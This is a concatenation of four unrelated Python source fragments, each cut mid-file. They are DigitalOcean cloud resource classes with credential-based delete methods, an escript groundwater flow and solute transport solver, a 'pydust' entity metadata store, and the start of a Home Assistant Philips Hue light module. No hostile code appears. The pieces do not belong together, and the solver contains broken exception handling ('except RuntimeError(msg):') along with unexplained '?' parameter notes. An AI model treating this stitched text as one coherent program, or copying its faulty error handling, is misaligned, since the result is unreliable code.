@dataclass(eq=False)
class DigitalOceanDatabase(DigitalOceanResource, BaseDatabase): # type: ignore
kind: ClassVar[str] = "digitalocean_database"
def delete_uri_path(self) -> Optional[str]:
return "/databases"
def tag_resource_name(self) -> Optional[str]:
return "database"
@dataclass(eq=False)
class DigitalOceanNetwork(DigitalOceanResource, BaseNetwork): # type: ignore
"""DigitalOcean network
This is what instances and other networking related resources might reside in.
"""
kind: ClassVar[str] = "digitalocean_network"
ip_range: Optional[str] = None
description: Optional[str] = None
is_default: Optional[bool] = None
def delete_uri_path(self) -> Optional[str]:
return "/vpcs"
@dataclass(eq=False)
class DigitalOceanSnapshot(DigitalOceanResource, BaseSnapshot): # type: ignore
"""DigitalOcean snapshot"""
kind: ClassVar[str] = "digitalocean_snapshot"
snapshot_size_gigabytes: Optional[int] = None
resource_id: Optional[str] = None
resource_type: Optional[str] = None
def delete_uri_path(self) -> Optional[str]:
return "/snapshots"
def tag_resource_name(self) -> Optional[str]:
return "volume_snapshot"
@dataclass(eq=False)
class DigitalOceanLoadBalancer(DigitalOceanResource, BaseLoadBalancer): # type: ignore
"""DigitalOcean load balancer"""
kind: ClassVar[str] = "digitalocean_load_balancer"
nr_nodes: Optional[int] = None
loadbalancer_status: Optional[str] = None
redirect_http_to_https: Optional[bool] = None
enable_proxy_protocol: Optional[bool] = None
enable_backend_keepalive: Optional[bool] = None
disable_lets_encrypt_dns_records: Optional[bool] = None
def delete_uri_path(self) -> Optional[str]:
return "/load_balancers"
@dataclass(eq=False)
class DigitalOceanFloatingIP(DigitalOceanResource, BaseIPAddress): # type: ignore
"""DigitalOcean floating IP"""
kind: ClassVar[str] = "digitalocean_floating_ip"
is_locked: Optional[bool] = None
def delete(self, graph: Graph) -> bool:
log.debug(
f"Deleting resource {self.id} in account {self.account(graph).id} region {self.region(graph).id}"
)
team = self.account(graph)
credentials = get_team_credentials(team.id)
if credentials is None:
raise RuntimeError(
f"Cannot delete resource {self.id}, credentials not found for team {team.id}"
)
client = StreamingWrapper(
credentials.api_token,
credentials.spaces_access_key,
credentials.spaces_secret_key,
)
# un-assign the ip just in case it's still assigned to a droplet
client.unassign_floating_ip(self.id)
return client.delete("/floating_ips", self.id)
@dataclass(eq=False)
class DigitalOceanImage(DigitalOceanResource, BaseResource): # type: ignore
"""DigitalOcean image"""
kind: ClassVar[str] = "digitalocean_image"
distribution: Optional[str] = None
image_slug: Optional[str] = None
is_public: Optional[bool] = None
min_disk_size: Optional[int] = None
image_type: Optional[str] = None
size_gigabytes: Optional[int] = None
description: Optional[str] = None
image_status: Optional[str] = None
def delete_uri_path(self) -> Optional[str]:
return "/images"
def tag_resource_name(self) -> Optional[str]:
return "image"
@dataclass(eq=False)
class DigitalOceanSpace(DigitalOceanResource, BaseBucket): # type: ignore
"""DigitalOcean space"""
kind: ClassVar[str] = "digitalocean_space"
def delete(self, graph: Graph) -> bool:
log.debug(
f"Deleting space {self.id} in account {self.account(graph).id} region {self.region(graph).id}"
)
team = self.account(graph)
credentials = get_team_credentials(team.id)
if credentials is None:
raise RuntimeError(
f"Cannot delete resource {self.id}, credentials not found for team {team.id}"
)
client = StreamingWrapper(
credentials.api_token,
credentials.spaces_access_key,
credentials.spaces_secret_key,
)
return client.delete_space(self.region(graph).id, self.id)
@dataclass(eq=False)
class DigitalOceanApp(DigitalOceanResource, BaseResource): # type: ignore
"""DigitalOcean app"""
kind: ClassVar[str] = "digitalocean_app"
tier_slug: Optional[str] = None
default_ingress: Optional[str] = None
live_url: Optional[str] = None
live_url_base: Optional[str] = None
live_domain: Optional[str] = None
def delete_uri_path(self) -> Optional[str]:
return "/apps"
@dataclass(eq=False)
class DigitalOceanCdnEndpoint(DigitalOceanResource, BaseEndpoint): # type: ignore
"""DigitalOcean CDN endpoint"""
kind = "digitalocean_cdn_endpoint"
origin: Optional[str] = None
endpoint: Optional[str] = None
certificate_id: Optional[str] = None
custom_domain: Optional[str] = None
ttl: Optional[int] = None
def delete_uri_path(self) -> Optional[str]:
return "/cdn/endpoints"
@dataclass(eq=False)
class DigitalOceanCertificate(DigitalOceanResource, BaseCertificate): # type: ignore
"""DigitalOcean certificate"""
kind = "digitalocean_certificate"
certificate_state: Optional[str] = None
certificate_type: Optional[str] = None
def delete_uri_path(self) -> Optional[str]:
return "/certificates"
@dataclass(eq=False)
class DigitalOceanContainerRegistry(DigitalOceanResource, BaseResource): # type: ignore
"""DigitalOcean container registry"""
kind = "digitalocean_container_registry"
storage_usage_bytes: Optional[int] = None
is_read_only: Optional[bool] = None
def delete(self, graph: Graph) -> bool:
"""Delete the container registry from the cloud"""
log.debug(
f"Deleting registry {self.id} in account {self.account(graph).id} region {self.region(graph).id}"
)
team = self.account(graph)
credentials = get_team_credentials(team.id)
if credentials is None:
raise RuntimeError(
f"Cannot delete resource {self.id}, credentials not found for team {team.id}"
)
client = StreamingWrapper(
credentials.api_token,
credentials.spaces_access_key,
| |
concentration, rho_f,
phi, diffusivity, l_disp, t_disp,
solute_source,
specific_storage,
k_tensor, k_vector,
dispersion_tensor,
viscosity,
gamma, alpha,
fluid_source,
rho_f_0,
specified_pressure_bnd,
specified_pressure,
specified_concentration_bnd,
specified_concentration,
specified_concentration_rho_f,
rch_bnd_loc,
recharge_mass_flux,
coupled_iterations=True,
solute_transport=True,
heat_transport=False,
steady_state=False,
proj=None,
drain_loc=None,
seepage_bnd=False,
recalculate_seepage_bnd=True,
active_seepage_bnd=None,
concentration_bnd_inflow_only=False,
concentration_bnd_inflow_direction='up',
max_allowed_CFL_number=None,
force_CFL_timestep=False,
dt_max=None,
calculate_viscosity=False,
verbose=False,
iterate_seepage_in_one_timestep=False,
max_seepage_iterations=50,
ignore_convergence_failure=False):
"""
Iterative solve groundwater flow, solute transport and heat flow equations.
solves either steady state or 1 timestep in implicit or explicit mode
iterative coupling scheme of solute transport, pressure & flow eqs. and
eqs of state follows Ackerer (2004), Geophysical Research Letters 31(12)
Parameters
---------
mesh :
escript mesh object
pressure_pde :
groundwater flow PDE
solute_pde
solute transport PDE
pressure_convergence_criterion : float
convergence criterion groundwater flow eq. (Pa)
concentration_convergence_criterion : float
convergence criterion solute transport eq. (kg/kg)
max_iterations : int
max number of iterations
dt : int
timestep
g_vector :
gravity vector (0,g)
pressure :
pressure (Pa)
concentration :
solute concentration (kg/kg)
rho_f :
fluid density (kg / m3)
phi :
porosity
D :
solute diffusivity (...)
l_disp :
longitudinal dispersivity (...)
t_disp :
transverse dispersivity (...)
solute_source :
solute source (units...)
specific_storage :
specific storativity (...)
k :
permeability (m2)
anisotropy :
permeability anisotropy = horizontal/vertical permeability
(dimensionless)
viscosity :
viscosity (...)
gamma :
?
alpha :
?
fluid_source :
fluid source term (...)
rho_f_0
fluid density at solute concentration C=0 (kg/m3)
specified_pressure_bnd
location of specified pressure boundary
specified_pressure
specified pressure (Pa)
specified_concentration_bnd
location of specified concentration boundary
specified_concentration
specified concentration (kg/kg)
rch_bnd_loc :
recharge_mass_flux : float
coupled_iterations : bool, optional
couple groundwater and solute transport equations iteratively
by adjusting density term
solute_transport : bool, optional
if True, simulate solute transport
heat_transport : bool, optional
if True, simulate heat transport
steady_state : bool, optional
True for steady state groundwater flow, False for transient
verbose : bool, optional
verbose text output
drain_loc :
location of drain boundary nodes
debug : bool, optional
debugging
dt_max : float?
=None ...
proj :
escript PDE for projecting element data to nodes
seepage_optimization_automated : boolean
Returns
-------
pressure_t2_i2 :
pressure at next timestep (t2) and last iteration (i2)
concentration_t2_i2 :
solute concentration (kg/kg)
rho_f_t2_i2 :
fluid density
iteration : int
number of iterations
dt_max :
max timestep size
"""
# calculate transverse dispersivity
#t_disp = l_disp * disp_ratio
year = 365.25 *24 * 60 * 60.
if verbose is True:
print('running iterative solver for pressure and concentration PDEs')
if coupled_iterations is False:
print('pressure and concentration are not coupled')
#pressure_new = pressure
pressure_old_ts = pressure
concentration_old_ts = concentration
fluid_density_new = fluid_density_old = rho_f
#pressure_t1 = pressure.copy()
#concentration_t1 = concentration.copy()
# added 22 jun 2016, not sure if this is ok:
active_rch_bnd = rch_bnd_loc
if coupled_iterations is True and calculate_viscosity is True:
viscosity_new = calculate_viscosity_simple(concentration)
else:
viscosity_new = viscosity
active_specified_concentration_bnd = specified_concentration_bnd
iteration = 0
converged = False
non_convergence = False
ele_size = None
q = None
v = None
while converged is False and non_convergence is False:
if verbose is True:
print('iteration ', iteration)
if iteration > 0:
print('pressure convergence ', es.Lsup(pressure_conv))
if solute_transport is True:
# get flux
q = calculate_q(k_vector, viscosity_new, pressure_old_ts,
fluid_density_new, g_vector)
v = q / phi
# calculate new solute concentration
concentration_old_iteration = concentration
# finite element solute transport
if concentration_bnd_inflow_only is True and iteration == 0:
# only apply concentration bnd for inflow into model domain
# assumes a horizontal model bnd
# TODO: calculate flux normal to model boundary to account
# for non-horizontal upper boundaries
proj.setValue(D=es.kronecker(mesh), Y=q)
try:
nodal_q = proj.getSolution()
except RuntimeError(msg):
print('error, non-convergence')
print(msg)
non_convergence = True
nodal_q_norm = rotate_vector_escript(nodal_q, topo_gradient)
nodal_v = nodal_q / phi
if concentration_bnd_inflow_direction == 'up':
inflow_bnd = (es.whereNegative(nodal_q_norm[1]) *
specified_concentration_bnd)
elif concentration_bnd_inflow_direction == 'down':
inflow_bnd = (es.wherePositive(nodal_q_norm[1]) *
specified_concentration_bnd)
elif concentration_bnd_inflow_direction == 'left':
inflow_bnd = (es.wherePositive(nodal_q[0]) *
specified_concentration_bnd)
elif concentration_bnd_inflow_direction == 'right':
inflow_bnd = (es.whereNegative(nodal_q[0]) *
specified_concentration_bnd)
if es.sup(inflow_bnd) > 0:
active_specified_concentration_bnd = inflow_bnd
else:
min_x = es.inf(
specified_concentration_bnd *
specified_concentration_bnd.getDomain().getX()[0])
active_specified_concentration_bnd = \
(specified_concentration_bnd *
es.whereZero(
specified_concentration_bnd.getDomain().getX()[0]
- min_x))
if verbose is True:
print('warning, outflow for all specified ' \
'concentration boundary nodes')
#print 'using entire bnd instead'
#active_specified_concentration_bnd = \
# specified_concentration_bnd
print('using first node as fixed conc bnd instead')
print('number of active conc bnd nodes:')
print(np.sum(np.array(
active_specified_concentration_bnd.
toListOfTuples())))
if verbose is True:
import grompy_lib
xyi, ia = grompy_lib.convert_to_array(
active_specified_concentration_bnd)
xyc, ca = grompy_lib.convert_to_array(
specified_concentration_bnd)
print('inflow conc bnd nodes = %0.0f / %0.0f' \
% (ia.sum(), ca.sum()))
print('x = %0.3f - %0.3f' % (xyi[ia == 1, 0].min(),
xyi[ia == 1, 0].max()))
print('qv conc bnd: ', (nodal_q[1] *
specified_concentration_bnd))
#solute_pde.setValue(D=1,
# r=specified_concentration_rho_f,
# q=active_specified_concentration_bnd)
solute_pde.setValue(D=1,
r=specified_concentration,
q=active_specified_concentration_bnd)
solute_pde = update_solute_transport_pde(
mesh, solute_pde,
concentration_old_ts, v, dt, solute_source,
dispersion_tensor,
diffusivity, l_disp, t_disp, fluid_density_old)
try:
#solute_mass = solute_pde.getSolution()
concentration = solute_pde.getSolution()
except RuntimeError(error_msg):
print('!! runtime error ', error_msg)
print('solver options: ')
print(solute_pde.getSolverOptions().getSummary())
non_convergence = True
#raise RuntimeError(error_msg)
# calculate concentration, using new solute mass and eq of state
#concentration_new = calculate_concentration(
# solute_mass, rho_f_0, gamma)
#concentration_new = solve_solute_transport_v2(
# solute_pde, mesh,
# steady_state,
# concentration_t1, v, dt, solute_source,
# diffusivity, l_disp, t_disp, fluid_density_old,
# rho_f_0, gamma)
concentration_change_rate = \
(concentration - concentration_old_ts) / dt
else:
# no solute transport:
concentration_change_rate = 0
if heat_transport is True:
# no temperature in models yet:
temperature_change_rate = 0
else:
# no heat transport:
temperature_change_rate = 0
if coupled_iterations is True:
if verbose is True:
print('recalculating fluid density and viscosity')
# recalculate fluid density
fluid_density_old = fluid_density_new
fluid_density_new = \
calculate_fluid_density(concentration, gamma, rho_f_0)
if calculate_viscosity is True:
viscosity_new = \
calculate_viscosity_simple(concentration)
else:
# leave fluid density unchanged
concentration_change_rate = 0
temperature_change_rate = 0
# store old pressure
pressure_old_iteration = pressure
if drain_loc is None or es.sup(drain_loc) == 0:
# calculate pressure, no drain or seepage bnd
pressure_pde = \
update_pressure_pde(pressure_pde,
pressure_old_ts,
phi, specific_storage,
k_tensor, k_vector,
fluid_density_new,
viscosity_new, dt,
rch_bnd_loc,
recharge_mass_flux,
fluid_source, g_vector,
gamma, concentration_change_rate,
alpha, temperature_change_rate)
try:
pressure = pressure_pde.getSolution()
except RuntimeError(msg):
print('error, non-convergence')
print(msg)
non_convergence = True
#print 'no seepage bnd'
else:
# implement drain or seepage boundary
if seepage_bnd is True:
## use seepage boundary:
if active_seepage_bnd is None:
# calculate pressure without any drain boundary
pressure_pde.setValue(r=specified_pressure,
q=specified_pressure_bnd)
active_rch_bnd = rch_bnd_loc
else:
# incorporate active drain bnd of previous timestep
specified_pressure_bnd_mod = \
es.wherePositive(
specified_pressure_bnd + active_seepage_bnd)
pressure_pde.setValue(r=specified_pressure,
q=specified_pressure_bnd_mod)
# do not change active rch bnd
active_rch_bnd = rch_bnd_loc
#active_rch_bnd = rch_bnd_loc * \
# es.whereZero(specified_pressure_bnd)
#specified_flux = rch_bnd_loc * dt * recharge_mass_flux
# calculate pressure with existing seepage bnd
pressure_pde = \
update_pressure_pde(pressure_pde,
pressure_old_ts,
phi, specific_storage,
k_tensor, k_vector,
fluid_density_new,
viscosity_new, dt,
active_rch_bnd, recharge_mass_flux,
fluid_source, g_vector,
gamma, concentration_change_rate,
alpha, temperature_change_rate)
try:
pressure = pressure_pde.getSolution()
except RuntimeError:
print("error, pressure PDE solver failed")
converged = True
non_convergence = True
#if pressure_new not in locals():
# pressure_new = pressure_t1
# assign drain bnd nodes
if active_seepage_bnd is None:
active_seepage_bnd = \
es.wherePositive(drain_loc * pressure)
if iteration < max_seepage_iterations and recalculate_seepage_bnd is True:
# adjust seepage boundary, but only for first x iterations
# to avoid instability
if verbose is True:
seepage_xy = active_seepage_bnd.getDomain().getX()
seepage_nodes_xy = \
np.array(seepage_xy.toListOfTuples())
seepage_array = np.array(
active_seepage_bnd.toListOfTuples())
ind = seepage_array > 0
print('\tbefore adjustment:')
print('\tactive seepage bnd from x=%0.0f to %0.0f m' \
% (seepage_nodes_xy[ind, 0].min(),
seepage_nodes_xy[ind, 0].max()))
# remove seepage nodes that have become source of water
q = calculate_q(k_vector, viscosity_new, pressure,
fluid_density_new, g_vector)
proj.setValue(D=es.kronecker(mesh), Y=q)
try:
nodal_q = proj.getSolution()
except RuntimeError(msg):
print('error, non-convergence')
print(msg)
non_convergence = True
# calculate max vertical flux into the model domain at
# drain bnd nodes
# -> not possible, cannot mix face elements and normal elements
# later on to adjust seepage...
#nodal_q_norm = nodal_q * nodal_q.getDomain().getNormal()
#
nodal_q_norm = rotate_vector_escript(nodal_q, topo_gradient)
#flux_seepage_bnd = active_seepage_bnd * nodal_q[1]
flux_seepage_bnd = active_seepage_bnd * nodal_q_norm[1]
#flux_seepage_bnd_corr = flux_seepage_bnd +
seepage_change_buffer = 1e-3 / year
seepage_inflow_nodes = \
es.whereNegative(flux_seepage_bnd
+ recharge_mass_flux
/ fluid_density_new)
if verbose is True:
print('\tflux seepage | |
<reponame>MondoAurora/pydust
import json
import os
import yaml
import traceback
import inspect
import deepdiff
from enum import Enum
from collections import namedtuple
from datetime import datetime
from dust import Datatypes, ValueTypes, Operation, MetaProps, FieldProps, Committed
from importlib import import_module
import threading
_messages_create_message = None
_store_lock = threading.RLock()
UNIT_ENTITY = "entity"
UNIT_ENTITY_META = "entity_meta"
UNIT_ID = 1
UNIT_META_ID = 2
class UnitMeta(MetaProps):
name = (Datatypes.STRING, ValueTypes.SINGLE, 1, 100)
id_cnt = (Datatypes.INT, ValueTypes.SINGLE, 2, 101)
meta_types = (Datatypes.ENTITY, ValueTypes.SET, 3, 102)
class TypeMeta(MetaProps):
name = (Datatypes.STRING, ValueTypes.SINGLE, 1, 200)
fields = (Datatypes.ENTITY, ValueTypes.SET, 2, 201)
class MetaField(MetaProps):
name = (Datatypes.STRING, ValueTypes.SINGLE, 1, 300)
global_name = (Datatypes.STRING, ValueTypes.SINGLE, 2, 301)
field_order = (Datatypes.INT, ValueTypes.SINGLE, 3, 302)
class EntityBaseMeta(MetaProps):
unit = (Datatypes.ENTITY, ValueTypes.SINGLE, 1, 400)
meta_type = (Datatypes.ENTITY, ValueTypes.SINGLE, 2, 401)
entity_id = (Datatypes.INT, ValueTypes.SINGLE, 3, 402)
committed = (Datatypes.STRING, ValueTypes.SINGLE, 4 ,403)
class EntityTypes(FieldProps):
type_meta = (UNIT_ENTITY_META, TypeMeta, 1)
_entity_base = (UNIT_ENTITY_META, EntityBaseMeta, 2)
unit = (UNIT_ENTITY_META, UnitMeta, 3)
meta_field = (UNIT_ENTITY_META, MetaField, 4)
def get_unit_deps_tuple(module_name, unit_name, meta_type_enums):
module = import_module(module_name)
unit_name_attr = getattr(module, unit_name)
meta_type_enums_attr = getattr(module, meta_type_enums)
dep_func = getattr(module, "get_unit_dependencies", None)
return (unit_name_attr, meta_type_enums_attr, dep_func)
def compare_entity_to_json_simple(meta_type_enum, entity, json_entity, json_entity_map, compare_sub_entity_fields, log_prefix=""):
changed = {}
for field in meta_type_enum.fields_enum:
if field.valuetype == ValueTypes.SINGLE:
if field.datatype == Datatypes.ENTITY:
if compare_sub_entity_fields and field in compare_sub_entity_fields:
orig_value = entity.access(Operation.GET, None, field)
#print(field.name+"-"+str(orig_value)+"-"+str(_entity_map[entity.global_id()][0]))
new_value = None
new_entity_global_id = json_entity.get(Store.get_global_fieldname(field))
if new_entity_global_id:
new_value = json_entity_map[new_entity_global_id]
#print(str(new_value))
if orig_value is None and not new_value is None or not orig_value is None and new_value is None:
changed[log_prefix+field.name] = {"orig_value": orig_value, "new_value": new_value}
elif not orig_value is None and not new_value is None:
changed.update(compare_entity_to_json_simple(compare_sub_entity_fields[field], orig_value, new_value, json_entity_map, None, log_prefix="{}#".format(field.name)))
else:
if ( json_entity is None and not entity is None ) or ( not json_entity is None and entity is None ) or \
json_entity and entity.access(Operation.GET, None, field) != json_entity.get(Store.get_global_fieldname(field)):
changed[log_prefix+field.name] = {"orig_value": entity.access(Operation.GET, None, field), "new_value": json_entity.get(Store.get_global_fieldname(field))}
elif field.valuetype == ValueTypes.SET or field.valuetype == ValueTypes.LIST or field.valuetype == ValueTypes.MAP:
if field.datatype != Datatypes.ENTITY:
iter1 = entity.access(Operation.GET, None, field)
iter2 = json_entity.get(Store.get_global_fieldname(field))
if field.valuetype == field.valuetype == ValueTypes.SET and iter2:
iter2 = set(iter2)
dd = deepdiff.DeepDiff(iter1, iter2, ignore_order=True)
if dd:
changed[log_prefix+field.name] = {"orig_value": entity.access(Operation.GET, None, field), "new_value": json_entity.get(Store.get_global_fieldname(field))}
elif field.valuetype == ValueTypes.SET or field.valuetype == ValueTypes.LIST:
if compare_sub_entity_fields and field in compare_sub_entity_fields:
orig_value_global_ids = entity.access(Operation.GET, None, field)
new_entity_global_ids = json_entity.get(Store.get_global_fieldname(field))
# at this point we only have unordered ids, so we have to compare everything to everything and fail as early as possible
if not orig_value_global_ids and new_entity_global_ids or not new_entity_global_ids and orig_value_global_ids or len(orig_value_global_ids) != len(new_entity_global_ids):
changed[log_prefix+field.name] = {"orig_list_value": list(orig_value_global_ids), "new_list_value": list(new_entity_global_ids)}
else:
# Same number of entries
no_match_found = False
match_to = list(new_entity_global_ids)
for orig_value_global_id in orig_value_global_ids:
orig_value = Store.access(Operation.GET, None, orig_value_global_id)
if orig_value is None:
no_match_found = True
break
else:
match_found = False
for new_entity_global_id in match_to:
new_value = json_entity_map[new_entity_global_id]
if not new_value is None:
sub_changed = compare_entity_to_json_simple(compare_sub_entity_fields[field], orig_value, new_value, json_entity_map, None, log_prefix="{}#".format(field.name))
if len(sub_changed) == 0:
match_found = True
break
if not match_found:
no_match_found = True
break
if no_match_found:
changed[log_prefix+field.name] = {"orig_list_value": list(orig_value_global_ids), "new_list_value": list(new_entity_global_ids)}
return changed
class Store():
@staticmethod
def load_unit_types(filenames):
for filename in filenames:
with open(filename, "r") as tf:
loaded__meta_types = yaml.load(tf, Loader=yaml.FullLoader)["types"]
Store.load_types_from_dict(loaded__meta_types)
@staticmethod
def create_unit(unit_name, unit_id):
entity_map = globals()["_entity_map"]
enum_map = globals()["_enum_map"]
if not unit_name in [UNIT_ENTITY, UNIT_ENTITY_META] and not unit_name in enum_map:
unit = Store.access(Operation.GET, None, UNIT_ENTITY, unit_id, EntityTypes.unit)
enum_map[unit_name] = unit
enum_map[unit] = unit_name
#print("Unit name: {} ({}), global id: {}".format(unit_name, unit.entity_id, unit.global_id()))
unit.access(Operation.SET, 0, UnitMeta.id_cnt)
unit.access(Operation.SET, unit_name, UnitMeta.name)
elif not ( UNIT_ENTITY+":2:"+EntityTypes.unit.name ) in entity_map:
unit = Store._create_entity(None, 1, None)
unit.unit = unit
enum_map[UNIT_ENTITY] = unit
enum_map[unit] = UNIT_ENTITY
unit_meta = Store._create_entity(unit, 2, None)
enum_map[UNIT_ENTITY_META] = unit_meta
enum_map[unit_meta] = UNIT_ENTITY_META
cnt = 0
types = {}
for entity_type in EntityTypes:
cnt += 1
et = Store._create_entity(unit_meta, entity_type.id_value, None)
enum_map[entity_type] = et
enum_map[et] = entity_type
if entity_type.id_value > cnt:
cnt = entity_type.id_value
unit.meta_type = enum_map[EntityTypes.unit]
unit_meta.meta_type = enum_map[EntityTypes.unit]
enum_map[EntityTypes.unit].meta_type = enum_map[EntityTypes.type_meta]
Store._add_entity_to_store(unit)
Store._add_entity_to_store(unit_meta)
for entity_type in [EntityTypes.type_meta, EntityTypes.unit, EntityTypes._entity_base, EntityTypes.meta_field]:
et = enum_map[entity_type]
et.meta_type = enum_map[EntityTypes.type_meta]
enum_map[et.global_id()] = entity_type
Store._add_entity_to_store(et)
et.access(Operation.SET, entity_type.name, TypeMeta.name)
unit.access(Operation.SET, 2, UnitMeta.id_cnt)
unit.access(Operation.SET, UNIT_ENTITY, UnitMeta.name)
unit_meta.access(Operation.SET, cnt, UnitMeta.id_cnt)
unit_meta.access(Operation.SET, UNIT_ENTITY_META, UnitMeta.name)
return unit_meta
else:
unit = enum_map[unit_name]
return unit
@staticmethod
def _get_base_fields():
fields = []
for base_field in EntityBaseMeta:
fields.append(Store._global_field_name(UNIT_ENTITY_META, EntityTypes._entity_base.name, base_field.name))
return tuple(fields)
@staticmethod
def _create_entity(unit, entity_id, meta_type):
enum_map = globals()["_enum_map"]
if unit and not isinstance(unit, Entity):
unit = enum_map[unit]
if meta_type and not isinstance(meta_type, Entity):
meta_type = enum_map[meta_type]
e = Entity(unit, entity_id, meta_type)
if unit and meta_type:
Store._add_entity_to_store(e)
return e
def _add_entity_to_store(e):
entity_map = globals()["_entity_map"]
unit_field, meta_type_field, entity_id_field, committed_field = Store._get_base_fields()
entity_map[e.global_id()] = ({
unit_field: e.unit.global_id(),
entity_id_field: e.entity_id,
meta_type_field: e.meta_type.global_id(),
committed_field: e.committed.name
}, e)
@staticmethod
def increment_unit_counter(unit, requested_id):
if isinstance(unit, str):
unit = globals()["_enum_map"][unit]
unit_entity_map = globals()["_entity_map"][unit.global_id()][0]
if requested_id is None:
return unit.access(Operation.CHANGE, 1, UnitMeta.id_cnt)
elif not unit.entity_id is None:
current_cnt = unit_entity_map.get("entity_meta:unit:id_cnt")
if current_cnt == None or current_cnt < requested_id:
unit_entity_map["entity_meta:unit:id_cnt"] = requested_id
return requested_id
@staticmethod
def load_types_from_enum(e, unit_meta_id):
entity_map = globals()["_entity_map"]
#meta_ref = globals()["_meta_ref"]
enum_map = globals()["_enum_map"]
unit_meta_types = {}
for meta_type in e:
for field in meta_type.fields_enum:
global_name = Store._global_field_name(meta_type.unit_name, meta_type.name, field.name)
enum_map[global_name] = {"datatype": field.value[0], "valuetype": field.value[1], "id": field.id_value, "field_order": field.order_value, "_enum": field}
enum_map[field] = global_name
for base_field in EntityBaseMeta:
global_name = Store._global_field_name(UNIT_ENTITY_META, EntityTypes._entity_base.name, base_field.name)
enum_map[global_name] = {"datatype": base_field.value[0], "valuetype": base_field.value[1], "id": field.id_value, "field_order": base_field.order_value, "_enum": base_field}
enum_map[base_field] = global_name
for meta_type in e:
unit = Store.create_unit(meta_type.unit_name, unit_meta_id)
if meta_type in enum_map:
field_meta_type = enum_map[meta_type]
else:
cnt = unit.access(Operation.GET, 0, UnitMeta.id_cnt)
if meta_type.id_value > cnt:
unit.access(Operation.SET, meta_type.id_value, UnitMeta.id_cnt)
field_meta_type = Store.access(Operation.GET, None, meta_type.unit_name, meta_type.id_value, EntityTypes.type_meta)
field_meta_type.access(Operation.SET, meta_type.name, TypeMeta.name)
enum_map[meta_type] = field_meta_type
enum_map[field_meta_type] = meta_type
enum_map[field_meta_type.global_id()] = meta_type
#print("Unit name: {} ({}), meta_type: {}, global id: {}".format(unit.access(Operation.GET, None, UnitMeta.name), field_meta_type.unit.global_id(), meta_type.name ,field_meta_type.global_id()))
field_config = {}
max_order = 0
field_entities = []
max_id_value = 0
for field in meta_type.fields_enum:
global_name = Store._global_field_name(meta_type.unit_name, meta_type.name, field.name)
field_entity = Store.access(Operation.GET, None, meta_type.unit_name, field.id_value, EntityTypes.meta_field)
field_entity.access(Operation.SET, field.name, MetaField.name)
field_entity.access(Operation.SET, field.order_value, MetaField.field_order)
field_entity.access(Operation.SET, global_name, MetaField.global_name)
field_entities.append(field_entity)
if field.id_value > max_id_value:
max_id_value = field.id_value
for field_entity in field_entities:
field_meta_type.access(Operation.ADD, field_entity, TypeMeta.fields)
if max_id_value > 0:
cnt = unit.access(Operation.GET, 0, UnitMeta.id_cnt)
if max_id_value > cnt:
unit.access(Operation.SET, max_id_value, UnitMeta.id_cnt)
unit_meta_types.setdefault(unit, []).append(field_meta_type)
for unit, field_meta_types in unit_meta_types.items():
for field_meta_type in field_meta_types:
unit.access(Operation.ADD, field_meta_type, UnitMeta.meta_types)
@staticmethod
def access(operation, value, *path):
with _store_lock:
return Store._access(operation, value, *path)
@staticmethod
def _access(operation, value, *path):
entities = globals()["_entity_map"]
enum_map = globals()["_enum_map"]
local_ref = None
last_obj = None
remaining_path = None
idx = 0
last_global_id = None
last_entity_path = []
if len(path) > 0:
if operation == Operation.WALK and isinstance(path[0], list):
last_obj = path[0]
idx = 1
else:
unit, entity_id, meta_type = Entity._resolve_global_id(path[0])
if entity_id is None:
# path is done with 3 parts
if len(path) > 2 and ( path[1] is None or isinstance(path[1], int) ) and \
( isinstance( path[2], FieldProps ) or isinstance( path[2], Entity ) ):
entity_id = Store.increment_unit_counter(path[0], path[1])
local_ref = Entity._ref(path[0], entity_id, path[2])
idx = 3
else:
# found entity id on path[0]
local_ref = path[0]
idx = 1
if idx < len(path):
remaining_path = path[idx:]
else:
remaining_path = []
#print("Access 1: local_ref={}, path={}".format(local_ref, path))
if local_ref:
if not local_ref in entities:
last_obj = Store._create_entity(path[0], entity_id, path[2])
else:
last_obj = entities[local_ref][1]
last_global_id = last_obj.global_id()
path_length = len(remaining_path)
if last_obj and path_length == 0 and operation == Operation.GET:
if _messages_create_message:
_create_message(MessageType.ENTITY_ACCESS, {"path": last_entity_path, "op": operation}, [last_global_id])
return last_obj
else:
rv = None
if last_obj is None:
last_obj = [e[1] for e in entities.values()]
parent = last_obj
for last_idx in range(path_length):
key = remaining_path[last_idx]
#print("{}: Access 2: key={}".format(last_obj, key))
if last_obj is None:
last_obj = Store._access_data_create_container(parent, remaining_path[last_idx - 1], key)
elif isinstance(last_obj, Entity):
last_global_id = last_obj.global_id()
last_entity_path = path[last_idx:]
if isinstance(last_obj, str):
unit, entity_id, meta_type = Entity._resolve_global_id(last_obj)
if entity_id:
parent = entities[last_obj][1]
else:
parent = last_obj
else:
parent = last_obj
last_obj = Store._access_data_get_value(parent, key, None)
last_idx += 1
if operation == Operation.SET or operation == Operation.ADD or operation == Operation.CHANGE:
changed, rv = Store._access_data_set_value(parent, remaining_path[last_idx - 1], value, operation)
if changed and _messages_create_message:
_create_message(MessageType.ENTITY_ACCESS, | |
"""Support for the Philips Hue lights."""
from __future__ import annotations
from datetime import timedelta
from functools import partial
import logging
import random
import aiohue
import async_timeout
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_TRANSITION,
EFFECT_COLORLOOP,
EFFECT_RANDOM,
FLASH_LONG,
FLASH_SHORT,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from homeassistant.util import color
from .const import (
DOMAIN as HUE_DOMAIN,
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_LIGHT_SOURCE,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_ROOM,
REQUEST_REFRESH_DELAY,
)
from .helpers import remove_devices
SCAN_INTERVAL = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION
SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS
